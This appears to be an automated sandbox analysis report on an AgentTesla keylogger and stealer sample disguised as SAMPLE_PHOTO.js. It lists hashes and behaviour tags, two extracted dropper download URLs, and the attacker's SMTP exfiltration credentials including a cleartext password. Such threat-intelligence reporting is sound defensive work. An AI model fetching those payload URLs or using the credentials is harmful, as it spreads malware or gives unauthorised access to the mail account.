Overview

overview

10

Static

static

1

SAMPLE_PHOTO.js

windows7-x64

10

SAMPLE_PHOTO.js

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    SAMPLE_PHOTO.js

  • Size

    134KB

  • Sample

    241115-mstg4ashje

  • MD5

    8bba05d98ae1ac9cc82906a4b0009927

  • SHA1

    7b999d1f99203e2aa259fa3576ccee0cc4edfb2a

  • SHA256

    791db72c082562ed4c4b8579dd83fddf3f30ef6af450f72757ded6d686fbd300

  • SHA512

    e643617e43323e19dccb9b94f2076f6b3f7be87e38ab3bae9e5f0698df1b24896f3fb8013eb1452ac143c65b06f884a588e3a9214431352bc49e6499b75df7bb

  • SSDEEP

    3072:VfZR0BBn6Dxw8V/QaKkfi60sRrdBn6Dxw8V/QaKkfiu:rmBn61wkYSP9RpBn61wkYSr

Score
10/10
agenttesladiscoveryexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    mail.ctdi.com.ph
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    A#f+Y]H8iO4a

Extracted

Family

agenttesla

Credentials

Targets

    • Target

      SAMPLE_PHOTO.js

    • Size

      134KB

    • MD5

      8bba05d98ae1ac9cc82906a4b0009927

    • SHA1

      7b999d1f99203e2aa259fa3576ccee0cc4edfb2a

    • SHA256

      791db72c082562ed4c4b8579dd83fddf3f30ef6af450f72757ded6d686fbd300

    • SHA512

      e643617e43323e19dccb9b94f2076f6b3f7be87e38ab3bae9e5f0698df1b24896f3fb8013eb1452ac143c65b06f884a588e3a9214431352bc49e6499b75df7bb

    • SSDEEP

      3072:VfZR0BBn6Dxw8V/QaKkfi60sRrdBn6Dxw8V/QaKkfiu:rmBn61wkYSP9RpBn61wkYSr

    Score
    10/10
    executionagenttesladiscoverykeyloggerspywarestealertrojan

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in visual basic.

      keyloggertrojanstealerspywareagenttesla

    • Agenttesla family

      agenttesla

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks